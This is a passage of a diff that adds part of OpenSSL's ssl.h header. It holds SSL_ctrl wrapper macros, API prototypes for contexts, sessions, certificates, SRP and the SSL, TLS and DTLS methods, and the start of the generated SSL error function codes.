+# define SSL_set1_verify_cert_store(s,st) \
+        SSL_ctrl(s,SSL_CTRL_SET_VERIFY_CERT_STORE,1,(char *)st)
+# define SSL_set0_chain_cert_store(s,st) \
+        SSL_ctrl(s,SSL_CTRL_SET_CHAIN_CERT_STORE,0,(char *)st)
+# define SSL_set1_chain_cert_store(s,st) \
+        SSL_ctrl(s,SSL_CTRL_SET_CHAIN_CERT_STORE,1,(char *)st)
+# define SSL_get1_curves(ctx, s) \
+        SSL_ctrl(ctx,SSL_CTRL_GET_CURVES,0,(char *)s)
+# define SSL_CTX_set1_curves(ctx, clist, clistlen) \
+        SSL_CTX_ctrl(ctx,SSL_CTRL_SET_CURVES,clistlen,(char *)clist)
+# define SSL_CTX_set1_curves_list(ctx, s) \
+        SSL_CTX_ctrl(ctx,SSL_CTRL_SET_CURVES_LIST,0,(char *)s)
+# define SSL_set1_curves(ctx, clist, clistlen) \
+        SSL_ctrl(ctx,SSL_CTRL_SET_CURVES,clistlen,(char *)clist)
+# define SSL_set1_curves_list(ctx, s) \
+        SSL_ctrl(ctx,SSL_CTRL_SET_CURVES_LIST,0,(char *)s)
+# define SSL_get_shared_curve(s, n) \
+        SSL_ctrl(s,SSL_CTRL_GET_SHARED_CURVE,n,NULL)
+# define SSL_CTX_set_ecdh_auto(ctx, onoff) \
+        SSL_CTX_ctrl(ctx,SSL_CTRL_SET_ECDH_AUTO,onoff,NULL)
+# define SSL_set_ecdh_auto(s, onoff) \
+        SSL_ctrl(s,SSL_CTRL_SET_ECDH_AUTO,onoff,NULL)
+# define SSL_CTX_set1_sigalgs(ctx, slist, slistlen) \
+        SSL_CTX_ctrl(ctx,SSL_CTRL_SET_SIGALGS,slistlen,(int *)slist)
+# define SSL_CTX_set1_sigalgs_list(ctx, s) \
+        SSL_CTX_ctrl(ctx,SSL_CTRL_SET_SIGALGS_LIST,0,(char *)s)
+# define SSL_set1_sigalgs(ctx, slist, slistlen) \
+        SSL_ctrl(ctx,SSL_CTRL_SET_SIGALGS,clistlen,(int *)slist)
+# define SSL_set1_sigalgs_list(ctx, s) \
+        SSL_ctrl(ctx,SSL_CTRL_SET_SIGALGS_LIST,0,(char *)s)
+# define SSL_CTX_set1_client_sigalgs(ctx, slist, slistlen) \
+        SSL_CTX_ctrl(ctx,SSL_CTRL_SET_CLIENT_SIGALGS,slistlen,(int *)slist)
+# define SSL_CTX_set1_client_sigalgs_list(ctx, s) \
+        SSL_CTX_ctrl(ctx,SSL_CTRL_SET_CLIENT_SIGALGS_LIST,0,(char *)s)
+# define SSL_set1_client_sigalgs(ctx, slist, slistlen) \
+        SSL_ctrl(ctx,SSL_CTRL_SET_CLIENT_SIGALGS,clistlen,(int *)slist)
+# define SSL_set1_client_sigalgs_list(ctx, s) \
+        SSL_ctrl(ctx,SSL_CTRL_SET_CLIENT_SIGALGS_LIST,0,(char *)s)
+# define SSL_get0_certificate_types(s, clist) \
+        SSL_ctrl(s, SSL_CTRL_GET_CLIENT_CERT_TYPES, 0, (char *)clist)
+# define SSL_CTX_set1_client_certificate_types(ctx, clist, clistlen) \
+        SSL_CTX_ctrl(ctx,SSL_CTRL_SET_CLIENT_CERT_TYPES,clistlen,(char *)clist)
+# define SSL_set1_client_certificate_types(s, clist, clistlen) \
+        SSL_ctrl(s,SSL_CTRL_SET_CLIENT_CERT_TYPES,clistlen,(char *)clist)
+# define SSL_get_peer_signature_nid(s, pn) \
+        SSL_ctrl(s,SSL_CTRL_GET_PEER_SIGNATURE_NID,0,pn)
+# define SSL_get_server_tmp_key(s, pk) \
+        SSL_ctrl(s,SSL_CTRL_GET_SERVER_TMP_KEY,0,pk)
+# define SSL_get0_raw_cipherlist(s, plst) \
+        SSL_ctrl(s,SSL_CTRL_GET_RAW_CIPHERLIST,0,(char *)plst)
+# define SSL_get0_ec_point_formats(s, plst) \
+        SSL_ctrl(s,SSL_CTRL_GET_EC_POINT_FORMATS,0,(char *)plst)
+# ifndef OPENSSL_NO_BIO
+BIO_METHOD *BIO_f_ssl(void);
+BIO *BIO_new_ssl(SSL_CTX *ctx, int client);
+BIO *BIO_new_ssl_connect(SSL_CTX *ctx);
+BIO *BIO_new_buffer_ssl_connect(SSL_CTX *ctx);
+int BIO_ssl_copy_session_id(BIO *to, BIO *from);
+void BIO_ssl_shutdown(BIO *ssl_bio);
+
+# endif
+
+int SSL_CTX_set_cipher_list(SSL_CTX *, const char *str);
+SSL_CTX *SSL_CTX_new(const SSL_METHOD *meth);
+void SSL_CTX_free(SSL_CTX *);
+long SSL_CTX_set_timeout(SSL_CTX *ctx, long t);
+long SSL_CTX_get_timeout(const SSL_CTX *ctx);
+X509_STORE *SSL_CTX_get_cert_store(const SSL_CTX *);
+void SSL_CTX_set_cert_store(SSL_CTX *, X509_STORE *);
+int SSL_want(const SSL *s);
+int SSL_clear(SSL *s);
+
+void SSL_CTX_flush_sessions(SSL_CTX *ctx, long tm);
+
+const SSL_CIPHER *SSL_get_current_cipher(const SSL *s);
+int SSL_CIPHER_get_bits(const SSL_CIPHER *c, int *alg_bits);
+char *SSL_CIPHER_get_version(const SSL_CIPHER *c);
+const char *SSL_CIPHER_get_name(const SSL_CIPHER *c);
+unsigned long SSL_CIPHER_get_id(const SSL_CIPHER *c);
+
+int SSL_get_fd(const SSL *s);
+int SSL_get_rfd(const SSL *s);
+int SSL_get_wfd(const SSL *s);
+const char *SSL_get_cipher_list(const SSL *s, int n);
+char *SSL_get_shared_ciphers(const SSL *s, char *buf, int len);
+int SSL_get_read_ahead(const SSL *s);
+int SSL_pending(const SSL *s);
+# ifndef OPENSSL_NO_SOCK
+int SSL_set_fd(SSL *s, int fd);
+int SSL_set_rfd(SSL *s, int fd);
+int SSL_set_wfd(SSL *s, int fd);
+# endif
+# ifndef OPENSSL_NO_BIO
+void SSL_set_bio(SSL *s, BIO *rbio, BIO *wbio);
+BIO *SSL_get_rbio(const SSL *s);
+BIO *SSL_get_wbio(const SSL *s);
+# endif
+int SSL_set_cipher_list(SSL *s, const char *str);
+void SSL_set_read_ahead(SSL *s, int yes);
+int SSL_get_verify_mode(const SSL *s);
+int SSL_get_verify_depth(const SSL *s);
+int (*SSL_get_verify_callback(const SSL *s)) (int, X509_STORE_CTX *);
+void SSL_set_verify(SSL *s, int mode,
+                    int (*callback) (int ok, X509_STORE_CTX *ctx));
+void SSL_set_verify_depth(SSL *s, int depth);
+void SSL_set_cert_cb(SSL *s, int (*cb) (SSL *ssl, void *arg), void *arg);
+# ifndef OPENSSL_NO_RSA
+int SSL_use_RSAPrivateKey(SSL *ssl, RSA *rsa);
+# endif
+int SSL_use_RSAPrivateKey_ASN1(SSL *ssl, unsigned char *d, long len);
+int SSL_use_PrivateKey(SSL *ssl, EVP_PKEY *pkey);
+int SSL_use_PrivateKey_ASN1(int pk, SSL *ssl, const unsigned char *d,
+                            long len);
+int SSL_use_certificate(SSL *ssl, X509 *x);
+int SSL_use_certificate_ASN1(SSL *ssl, const unsigned char *d, int len);
+
+# ifndef OPENSSL_NO_TLSEXT
+/* Set serverinfo data for the current active cert. */
+int SSL_CTX_use_serverinfo(SSL_CTX *ctx, const unsigned char *serverinfo,
+                           size_t serverinfo_length);
+#  ifndef OPENSSL_NO_STDIO
+int SSL_CTX_use_serverinfo_file(SSL_CTX *ctx, const char *file);
+#  endif                        /* NO_STDIO */
+
+# endif
+
+# ifndef OPENSSL_NO_STDIO
+int SSL_use_RSAPrivateKey_file(SSL *ssl, const char *file, int type);
+int SSL_use_PrivateKey_file(SSL *ssl, const char *file, int type);
+int SSL_use_certificate_file(SSL *ssl, const char *file, int type);
+int SSL_CTX_use_RSAPrivateKey_file(SSL_CTX *ctx, const char *file, int type);
+int SSL_CTX_use_PrivateKey_file(SSL_CTX *ctx, const char *file, int type);
+int SSL_CTX_use_certificate_file(SSL_CTX *ctx, const char *file, int type);
+/* PEM type */
+int SSL_CTX_use_certificate_chain_file(SSL_CTX *ctx, const char *file);
+STACK_OF(X509_NAME) *SSL_load_client_CA_file(const char *file);
+int SSL_add_file_cert_subjects_to_stack(STACK_OF(X509_NAME) *stackCAs,
+                                        const char *file);
+#  ifndef OPENSSL_SYS_VMS
+/* XXXXX: Better scheme needed! [was: #ifndef MAC_OS_pre_X] */
+#   ifndef OPENSSL_SYS_MACINTOSH_CLASSIC
+int SSL_add_dir_cert_subjects_to_stack(STACK_OF(X509_NAME) *stackCAs,
+                                       const char *dir);
+#   endif
+#  endif
+
+# endif
+
+void SSL_load_error_strings(void);
+const char *SSL_state_string(const SSL *s);
+const char *SSL_rstate_string(const SSL *s);
+const char *SSL_state_string_long(const SSL *s);
+const char *SSL_rstate_string_long(const SSL *s);
+long SSL_SESSION_get_time(const SSL_SESSION *s);
+long SSL_SESSION_set_time(SSL_SESSION *s, long t);
+long SSL_SESSION_get_timeout(const SSL_SESSION *s);
+long SSL_SESSION_set_timeout(SSL_SESSION *s, long t);
+void SSL_copy_session_id(SSL *to, const SSL *from);
+X509 *SSL_SESSION_get0_peer(SSL_SESSION *s);
+int SSL_SESSION_set1_id_context(SSL_SESSION *s, const unsigned char *sid_ctx,
+                                unsigned int sid_ctx_len);
+
+SSL_SESSION *SSL_SESSION_new(void);
+const unsigned char *SSL_SESSION_get_id(const SSL_SESSION *s,
+                                        unsigned int *len);
+unsigned int SSL_SESSION_get_compress_id(const SSL_SESSION *s);
+# ifndef OPENSSL_NO_FP_API
+int SSL_SESSION_print_fp(FILE *fp, const SSL_SESSION *ses);
+# endif
+# ifndef OPENSSL_NO_BIO
+int SSL_SESSION_print(BIO *fp, const SSL_SESSION *ses);
+# endif
+void SSL_SESSION_free(SSL_SESSION *ses);
+int i2d_SSL_SESSION(SSL_SESSION *in, unsigned char **pp);
+int SSL_set_session(SSL *to, SSL_SESSION *session);
+int SSL_CTX_add_session(SSL_CTX *s, SSL_SESSION *c);
+int SSL_CTX_remove_session(SSL_CTX *, SSL_SESSION *c);
+int SSL_CTX_set_generate_session_id(SSL_CTX *, GEN_SESSION_CB);
+int SSL_set_generate_session_id(SSL *, GEN_SESSION_CB);
+int SSL_has_matching_session_id(const SSL *ssl, const unsigned char *id,
+                                unsigned int id_len);
+SSL_SESSION *d2i_SSL_SESSION(SSL_SESSION **a, const unsigned char **pp,
+                             long length);
+
+# ifdef HEADER_X509_H
+X509 *SSL_get_peer_certificate(const SSL *s);
+# endif
+
+STACK_OF(X509) *SSL_get_peer_cert_chain(const SSL *s);
+
+int SSL_CTX_get_verify_mode(const SSL_CTX *ctx);
+int SSL_CTX_get_verify_depth(const SSL_CTX *ctx);
+int (*SSL_CTX_get_verify_callback(const SSL_CTX *ctx)) (int,
+                                                        X509_STORE_CTX *);
+void SSL_CTX_set_verify(SSL_CTX *ctx, int mode,
+                        int (*callback) (int, X509_STORE_CTX *));
+void SSL_CTX_set_verify_depth(SSL_CTX *ctx, int depth);
+void SSL_CTX_set_cert_verify_callback(SSL_CTX *ctx,
+                                      int (*cb) (X509_STORE_CTX *, void *),
+                                      void *arg);
+void SSL_CTX_set_cert_cb(SSL_CTX *c, int (*cb) (SSL *ssl, void *arg),
+                         void *arg);
+# ifndef OPENSSL_NO_RSA
+int SSL_CTX_use_RSAPrivateKey(SSL_CTX *ctx, RSA *rsa);
+# endif
+int SSL_CTX_use_RSAPrivateKey_ASN1(SSL_CTX *ctx, const unsigned char *d,
+                                   long len);
+int SSL_CTX_use_PrivateKey(SSL_CTX *ctx, EVP_PKEY *pkey);
+int SSL_CTX_use_PrivateKey_ASN1(int pk, SSL_CTX *ctx,
+                                const unsigned char *d, long len);
+int SSL_CTX_use_certificate(SSL_CTX *ctx, X509 *x);
+int SSL_CTX_use_certificate_ASN1(SSL_CTX *ctx, int len,
+                                 const unsigned char *d);
+
+void SSL_CTX_set_default_passwd_cb(SSL_CTX *ctx, pem_password_cb *cb);
+void SSL_CTX_set_default_passwd_cb_userdata(SSL_CTX *ctx, void *u);
+
+int SSL_CTX_check_private_key(const SSL_CTX *ctx);
+int SSL_check_private_key(const SSL *ctx);
+
+int SSL_CTX_set_session_id_context(SSL_CTX *ctx, const unsigned char *sid_ctx,
+                                   unsigned int sid_ctx_len);
+
+SSL *SSL_new(SSL_CTX *ctx);
+int SSL_set_session_id_context(SSL *ssl, const unsigned char *sid_ctx,
+                               unsigned int sid_ctx_len);
+
+int SSL_CTX_set_purpose(SSL_CTX *s, int purpose);
+int SSL_set_purpose(SSL *s, int purpose);
+int SSL_CTX_set_trust(SSL_CTX *s, int trust);
+int SSL_set_trust(SSL *s, int trust);
+
+int SSL_CTX_set1_param(SSL_CTX *ctx, X509_VERIFY_PARAM *vpm);
+int SSL_set1_param(SSL *ssl, X509_VERIFY_PARAM *vpm);
+
+X509_VERIFY_PARAM *SSL_CTX_get0_param(SSL_CTX *ctx);
+X509_VERIFY_PARAM *SSL_get0_param(SSL *ssl);
+
+# ifndef OPENSSL_NO_SRP
+int SSL_CTX_set_srp_username(SSL_CTX *ctx, char *name);
+int SSL_CTX_set_srp_password(SSL_CTX *ctx, char *password);
+int SSL_CTX_set_srp_strength(SSL_CTX *ctx, int strength);
+int SSL_CTX_set_srp_client_pwd_callback(SSL_CTX *ctx,
+                                        char *(*cb) (SSL *, void *));
+int SSL_CTX_set_srp_verify_param_callback(SSL_CTX *ctx,
+                                          int (*cb) (SSL *, void *));
+int SSL_CTX_set_srp_username_callback(SSL_CTX *ctx,
+                                      int (*cb) (SSL *, int *, void *));
+int SSL_CTX_set_srp_cb_arg(SSL_CTX *ctx, void *arg);
+
+int SSL_set_srp_server_param(SSL *s, const BIGNUM *N, const BIGNUM *g,
+                             BIGNUM *sa, BIGNUM *v, char *info);
+int SSL_set_srp_server_param_pw(SSL *s, const char *user, const char *pass,
+                                const char *grp);
+
+BIGNUM *SSL_get_srp_g(SSL *s);
+BIGNUM *SSL_get_srp_N(SSL *s);
+
+char *SSL_get_srp_username(SSL *s);
+char *SSL_get_srp_userinfo(SSL *s);
+# endif
+
+void SSL_certs_clear(SSL *s);
+void SSL_free(SSL *ssl);
+int SSL_accept(SSL *ssl);
+int SSL_connect(SSL *ssl);
+int SSL_read(SSL *ssl, void *buf, int num);
+int SSL_peek(SSL *ssl, void *buf, int num);
+int SSL_write(SSL *ssl, const void *buf, int num);
+long SSL_ctrl(SSL *ssl, int cmd, long larg, void *parg);
+long SSL_callback_ctrl(SSL *, int, void (*)(void));
+long SSL_CTX_ctrl(SSL_CTX *ctx, int cmd, long larg, void *parg);
+long SSL_CTX_callback_ctrl(SSL_CTX *, int, void (*)(void));
+
+int SSL_get_error(const SSL *s, int ret_code);
+const char *SSL_get_version(const SSL *s);
+
+/* This sets the 'default' SSL version that SSL_new() will create */
+int SSL_CTX_set_ssl_version(SSL_CTX *ctx, const SSL_METHOD *meth);
+
+# ifndef OPENSSL_NO_SSL2
+const SSL_METHOD *SSLv2_method(void); /* SSLv2 */
+const SSL_METHOD *SSLv2_server_method(void); /* SSLv2 */
+const SSL_METHOD *SSLv2_client_method(void); /* SSLv2 */
+# endif
+
+# ifndef OPENSSL_NO_SSL3_METHOD
+const SSL_METHOD *SSLv3_method(void); /* SSLv3 */
+const SSL_METHOD *SSLv3_server_method(void); /* SSLv3 */
+const SSL_METHOD *SSLv3_client_method(void); /* SSLv3 */
+# endif
+
+const SSL_METHOD *SSLv23_method(void); /* Negotiate highest available SSL/TLS
+                                        * version */
+const SSL_METHOD *SSLv23_server_method(void); /* Negotiate highest available
+                                               * SSL/TLS version */
+const SSL_METHOD *SSLv23_client_method(void); /* Negotiate highest available
+                                               * SSL/TLS version */
+
+const SSL_METHOD *TLSv1_method(void); /* TLSv1.0 */
+const SSL_METHOD *TLSv1_server_method(void); /* TLSv1.0 */
+const SSL_METHOD *TLSv1_client_method(void); /* TLSv1.0 */
+
+const SSL_METHOD *TLSv1_1_method(void); /* TLSv1.1 */
+const SSL_METHOD *TLSv1_1_server_method(void); /* TLSv1.1 */
+const SSL_METHOD *TLSv1_1_client_method(void); /* TLSv1.1 */
+
+const SSL_METHOD *TLSv1_2_method(void); /* TLSv1.2 */
+const SSL_METHOD *TLSv1_2_server_method(void); /* TLSv1.2 */
+const SSL_METHOD *TLSv1_2_client_method(void); /* TLSv1.2 */
+
+const SSL_METHOD *DTLSv1_method(void); /* DTLSv1.0 */
+const SSL_METHOD *DTLSv1_server_method(void); /* DTLSv1.0 */
+const SSL_METHOD *DTLSv1_client_method(void); /* DTLSv1.0 */
+
+const SSL_METHOD *DTLSv1_2_method(void); /* DTLSv1.2 */
+const SSL_METHOD *DTLSv1_2_server_method(void); /* DTLSv1.2 */
+const SSL_METHOD *DTLSv1_2_client_method(void); /* DTLSv1.2 */
+
+const SSL_METHOD *DTLS_method(void); /* DTLS 1.0 and 1.2 */
+const SSL_METHOD *DTLS_server_method(void); /* DTLS 1.0 and 1.2 */
+const SSL_METHOD *DTLS_client_method(void); /* DTLS 1.0 and 1.2 */
+
+STACK_OF(SSL_CIPHER) *SSL_get_ciphers(const SSL *s);
+
+int SSL_do_handshake(SSL *s);
+int SSL_renegotiate(SSL *s);
+int SSL_renegotiate_abbreviated(SSL *s);
+int SSL_renegotiate_pending(SSL *s);
+int SSL_shutdown(SSL *s);
+
+const SSL_METHOD *SSL_CTX_get_ssl_method(SSL_CTX *ctx);
+const SSL_METHOD *SSL_get_ssl_method(SSL *s);
+int SSL_set_ssl_method(SSL *s, const SSL_METHOD *method);
+const char *SSL_alert_type_string_long(int value);
+const char *SSL_alert_type_string(int value);
+const char *SSL_alert_desc_string_long(int value);
+const char *SSL_alert_desc_string(int value);
+
+void SSL_set_client_CA_list(SSL *s, STACK_OF(X509_NAME) *name_list);
+void SSL_CTX_set_client_CA_list(SSL_CTX *ctx, STACK_OF(X509_NAME) *name_list);
+STACK_OF(X509_NAME) *SSL_get_client_CA_list(const SSL *s);
+STACK_OF(X509_NAME) *SSL_CTX_get_client_CA_list(const SSL_CTX *s);
+int SSL_add_client_CA(SSL *ssl, X509 *x);
+int SSL_CTX_add_client_CA(SSL_CTX *ctx, X509 *x);
+
+void SSL_set_connect_state(SSL *s);
+void SSL_set_accept_state(SSL *s);
+
+long SSL_get_default_timeout(const SSL *s);
+
+int SSL_library_init(void);
+
+char *SSL_CIPHER_description(const SSL_CIPHER *, char *buf, int size);
+STACK_OF(X509_NAME) *SSL_dup_CA_list(STACK_OF(X509_NAME) *sk);
+
+SSL *SSL_dup(SSL *ssl);
+
+X509 *SSL_get_certificate(const SSL *ssl);
+/*
+ * EVP_PKEY
+ */ struct evp_pkey_st *SSL_get_privatekey(const SSL *ssl);
+
+X509 *SSL_CTX_get0_certificate(const SSL_CTX *ctx);
+EVP_PKEY *SSL_CTX_get0_privatekey(const SSL_CTX *ctx);
+
+void SSL_CTX_set_quiet_shutdown(SSL_CTX *ctx, int mode);
+int SSL_CTX_get_quiet_shutdown(const SSL_CTX *ctx);
+void SSL_set_quiet_shutdown(SSL *ssl, int mode);
+int SSL_get_quiet_shutdown(const SSL *ssl);
+void SSL_set_shutdown(SSL *ssl, int mode);
+int SSL_get_shutdown(const SSL *ssl);
+int SSL_version(const SSL *ssl);
+int SSL_CTX_set_default_verify_paths(SSL_CTX *ctx);
+int SSL_CTX_load_verify_locations(SSL_CTX *ctx, const char *CAfile,
+                                  const char *CApath);
+# define SSL_get0_session SSL_get_session/* just peek at pointer */
+SSL_SESSION *SSL_get_session(const SSL *ssl);
+SSL_SESSION *SSL_get1_session(SSL *ssl); /* obtain a reference count */
+SSL_CTX *SSL_get_SSL_CTX(const SSL *ssl);
+SSL_CTX *SSL_set_SSL_CTX(SSL *ssl, SSL_CTX *ctx);
+void SSL_set_info_callback(SSL *ssl,
+                           void (*cb) (const SSL *ssl, int type, int val));
+void (*SSL_get_info_callback(const SSL *ssl)) (const SSL *ssl, int type,
+                                               int val);
+int SSL_state(const SSL *ssl);
+void SSL_set_state(SSL *ssl, int state);
+
+void SSL_set_verify_result(SSL *ssl, long v);
+long SSL_get_verify_result(const SSL *ssl);
+
+int SSL_set_ex_data(SSL *ssl, int idx, void *data);
+void *SSL_get_ex_data(const SSL *ssl, int idx);
+int SSL_get_ex_new_index(long argl, void *argp, CRYPTO_EX_new *new_func,
+                         CRYPTO_EX_dup *dup_func, CRYPTO_EX_free *free_func);
+
+int SSL_SESSION_set_ex_data(SSL_SESSION *ss, int idx, void *data);
+void *SSL_SESSION_get_ex_data(const SSL_SESSION *ss, int idx);
+int SSL_SESSION_get_ex_new_index(long argl, void *argp,
+                                 CRYPTO_EX_new *new_func,
+                                 CRYPTO_EX_dup *dup_func,
+                                 CRYPTO_EX_free *free_func);
+
+int SSL_CTX_set_ex_data(SSL_CTX *ssl, int idx, void *data);
+void *SSL_CTX_get_ex_data(const SSL_CTX *ssl, int idx);
+int SSL_CTX_get_ex_new_index(long argl, void *argp, CRYPTO_EX_new *new_func,
+                             CRYPTO_EX_dup *dup_func,
+                             CRYPTO_EX_free *free_func);
+
+int SSL_get_ex_data_X509_STORE_CTX_idx(void);
+
+# define SSL_CTX_sess_set_cache_size(ctx,t) \
+        SSL_CTX_ctrl(ctx,SSL_CTRL_SET_SESS_CACHE_SIZE,t,NULL)
+# define SSL_CTX_sess_get_cache_size(ctx) \
+        SSL_CTX_ctrl(ctx,SSL_CTRL_GET_SESS_CACHE_SIZE,0,NULL)
+# define SSL_CTX_set_session_cache_mode(ctx,m) \
+        SSL_CTX_ctrl(ctx,SSL_CTRL_SET_SESS_CACHE_MODE,m,NULL)
+# define SSL_CTX_get_session_cache_mode(ctx) \
+        SSL_CTX_ctrl(ctx,SSL_CTRL_GET_SESS_CACHE_MODE,0,NULL)
+
+# define SSL_CTX_get_default_read_ahead(ctx) SSL_CTX_get_read_ahead(ctx)
+# define SSL_CTX_set_default_read_ahead(ctx,m) SSL_CTX_set_read_ahead(ctx,m)
+# define SSL_CTX_get_read_ahead(ctx) \
+        SSL_CTX_ctrl(ctx,SSL_CTRL_GET_READ_AHEAD,0,NULL)
+# define SSL_CTX_set_read_ahead(ctx,m) \
+        SSL_CTX_ctrl(ctx,SSL_CTRL_SET_READ_AHEAD,m,NULL)
+# define SSL_CTX_get_max_cert_list(ctx) \
+        SSL_CTX_ctrl(ctx,SSL_CTRL_GET_MAX_CERT_LIST,0,NULL)
+# define SSL_CTX_set_max_cert_list(ctx,m) \
+        SSL_CTX_ctrl(ctx,SSL_CTRL_SET_MAX_CERT_LIST,m,NULL)
+# define SSL_get_max_cert_list(ssl) \
+        SSL_ctrl(ssl,SSL_CTRL_GET_MAX_CERT_LIST,0,NULL)
+# define SSL_set_max_cert_list(ssl,m) \
+        SSL_ctrl(ssl,SSL_CTRL_SET_MAX_CERT_LIST,m,NULL)
+
+# define SSL_CTX_set_max_send_fragment(ctx,m) \
+        SSL_CTX_ctrl(ctx,SSL_CTRL_SET_MAX_SEND_FRAGMENT,m,NULL)
+# define SSL_set_max_send_fragment(ssl,m) \
+        SSL_ctrl(ssl,SSL_CTRL_SET_MAX_SEND_FRAGMENT,m,NULL)
+
+     /* NB: the keylength is only applicable when is_export is true */
+# ifndef OPENSSL_NO_RSA
+void SSL_CTX_set_tmp_rsa_callback(SSL_CTX *ctx,
+                                  RSA *(*cb) (SSL *ssl, int is_export,
+                                              int keylength));
+
+void SSL_set_tmp_rsa_callback(SSL *ssl,
+                              RSA *(*cb) (SSL *ssl, int is_export,
+                                          int keylength));
+# endif
+# ifndef OPENSSL_NO_DH
+void SSL_CTX_set_tmp_dh_callback(SSL_CTX *ctx,
+                                 DH *(*dh) (SSL *ssl, int is_export,
+                                            int keylength));
+void SSL_set_tmp_dh_callback(SSL *ssl,
+                             DH *(*dh) (SSL *ssl, int is_export,
+                                        int keylength));
+# endif
+# ifndef OPENSSL_NO_ECDH
+void SSL_CTX_set_tmp_ecdh_callback(SSL_CTX *ctx,
+                                   EC_KEY *(*ecdh) (SSL *ssl, int is_export,
+                                                    int keylength));
+void SSL_set_tmp_ecdh_callback(SSL *ssl,
+                               EC_KEY *(*ecdh) (SSL *ssl, int is_export,
+                                                int keylength));
+# endif
+
+# ifndef OPENSSL_NO_COMP
+const COMP_METHOD *SSL_get_current_compression(SSL *s);
+const COMP_METHOD *SSL_get_current_expansion(SSL *s);
+const char *SSL_COMP_get_name(const COMP_METHOD *comp);
+STACK_OF(SSL_COMP) *SSL_COMP_get_compression_methods(void);
+STACK_OF(SSL_COMP) *SSL_COMP_set0_compression_methods(STACK_OF(SSL_COMP)
+                                                      *meths);
+void SSL_COMP_free_compression_methods(void);
+int SSL_COMP_add_compression_method(int id, COMP_METHOD *cm);
+# else
+const void *SSL_get_current_compression(SSL *s);
+const void *SSL_get_current_expansion(SSL *s);
+const char *SSL_COMP_get_name(const void *comp);
+void *SSL_COMP_get_compression_methods(void);
+int SSL_COMP_add_compression_method(int id, void *cm);
+# endif
+
+const SSL_CIPHER *SSL_CIPHER_find(SSL *ssl, const unsigned char *ptr);
+
+/* TLS extensions functions */
+int SSL_set_session_ticket_ext(SSL *s, void *ext_data, int ext_len);
+
+int SSL_set_session_ticket_ext_cb(SSL *s, tls_session_ticket_ext_cb_fn cb,
+                                  void *arg);
+
+/* Pre-shared secret session resumption functions */
+int SSL_set_session_secret_cb(SSL *s,
+                              tls_session_secret_cb_fn tls_session_secret_cb,
+                              void *arg);
+
+void SSL_set_debug(SSL *s, int debug);
+int SSL_cache_hit(SSL *s);
+int SSL_is_server(SSL *s);
+
+SSL_CONF_CTX *SSL_CONF_CTX_new(void);
+int SSL_CONF_CTX_finish(SSL_CONF_CTX *cctx);
+void SSL_CONF_CTX_free(SSL_CONF_CTX *cctx);
+unsigned int SSL_CONF_CTX_set_flags(SSL_CONF_CTX *cctx, unsigned int flags);
+unsigned int SSL_CONF_CTX_clear_flags(SSL_CONF_CTX *cctx, unsigned int flags);
+int SSL_CONF_CTX_set1_prefix(SSL_CONF_CTX *cctx, const char *pre);
+
+void SSL_CONF_CTX_set_ssl(SSL_CONF_CTX *cctx, SSL *ssl);
+void SSL_CONF_CTX_set_ssl_ctx(SSL_CONF_CTX *cctx, SSL_CTX *ctx);
+
+int SSL_CONF_cmd(SSL_CONF_CTX *cctx, const char *cmd, const char *value);
+int SSL_CONF_cmd_argv(SSL_CONF_CTX *cctx, int *pargc, char ***pargv);
+int SSL_CONF_cmd_value_type(SSL_CONF_CTX *cctx, const char *cmd);
+
+# ifndef OPENSSL_NO_SSL_TRACE
+void SSL_trace(int write_p, int version, int content_type,
+               const void *buf, size_t len, SSL *ssl, void *arg);
+const char *SSL_CIPHER_standard_name(const SSL_CIPHER *c);
+# endif
+
+# ifndef OPENSSL_NO_UNIT_TEST
+const struct openssl_ssl_test_functions *SSL_test_functions(void);
+# endif
+
+/* BEGIN ERROR CODES */
+/*
+ * The following lines are auto generated by the script mkerr.pl. Any changes
+ * made after this point may be overwritten when the script is next run.
+ */
+void ERR_load_SSL_strings(void);
+
+/* Error codes for the SSL functions. */
+
+/* Function codes. */
+# define SSL_F_CHECK_SUITEB_CIPHER_LIST                   331
+# define SSL_F_CLIENT_CERTIFICATE                         100
+# define SSL_F_CLIENT_FINISHED                            167
+# define SSL_F_CLIENT_HELLO                               101
+# define SSL_F_CLIENT_MASTER_KEY                          102
+# define SSL_F_D2I_SSL_SESSION                            103
+# define SSL_F_DO_DTLS1_WRITE                             245
+# define SSL_F_DO_SSL3_WRITE                              104
+# define SSL_F_DTLS1_ACCEPT                               246
+# define SSL_F_DTLS1_ADD_CERT_TO_BUF                      295
+# define SSL_F_DTLS1_BUFFER_RECORD                        247
+# define SSL_F_DTLS1_CHECK_TIMEOUT_NUM                    316
+# define SSL_F_DTLS1_CLIENT_HELLO                         248
+# define SSL_F_DTLS1_CONNECT                              249
+# define SSL_F_DTLS1_ENC                                  250
+# define SSL_F_DTLS1_GET_HELLO_VERIFY                     251
+# define SSL_F_DTLS1_GET_MESSAGE                          252
+# define SSL_F_DTLS1_GET_MESSAGE_FRAGMENT                 253
+# define SSL_F_DTLS1_GET_RECORD                           254
+# define SSL_F_DTLS1_HANDLE_TIMEOUT                       297
+# define SSL_F_DTLS1_HEARTBEAT                            305
+# define SSL_F_DTLS1_OUTPUT_CERT_CHAIN                    255
+# define SSL_F_DTLS1_PREPROCESS_FRAGMENT                  288
+# define SSL_F_DTLS1_PROCESS_OUT_OF_SEQ_MESSAGE           256
+# define SSL_F_DTLS1_PROCESS_RECORD                       257
+# define SSL_F_DTLS1_READ_BYTES                           258
+# define SSL_F_DTLS1_READ_FAILED                          259
+# define SSL_F_DTLS1_SEND_CERTIFICATE_REQUEST             260
+# define SSL_F_DTLS1_SEND_CLIENT_CERTIFICATE              261
+# define SSL_F_DTLS1_SEND_CLIENT_KEY_EXCHANGE             262
+# define SSL_F_DTLS1_SEND_CLIENT_VERIFY                   263
+# define SSL_F_DTLS1_SEND_HELLO_VERIFY_REQUEST            264
+# define SSL_F_DTLS1_SEND_SERVER_CERTIFICATE              265
+# define SSL_F_DTLS1_SEND_SERVER_HELLO                    266
+# define SSL_F_DTLS1_SEND_SERVER_KEY_EXCHANGE             267
+# define SSL_F_DTLS1_WRITE_APP_DATA_BYTES                 268
+# define SSL_F_GET_CLIENT_FINISHED                        105
+# define SSL_F_GET_CLIENT_HELLO                           106
+# define SSL_F_GET_CLIENT_MASTER_KEY                      107
+# define SSL_F_GET_SERVER_FINISHED                        108
+# define SSL_F_GET_SERVER_HELLO                           109
+# define SSL_F_GET_SERVER_VERIFY                          110
+# define SSL_F_I2D_SSL_SESSION                            111
+# define SSL_F_READ_N                                     112
+# define SSL_F_REQUEST_CERTIFICATE                        113
+# define SSL_F_SERVER_FINISH                              239
+# define SSL_F_SERVER_HELLO                               114
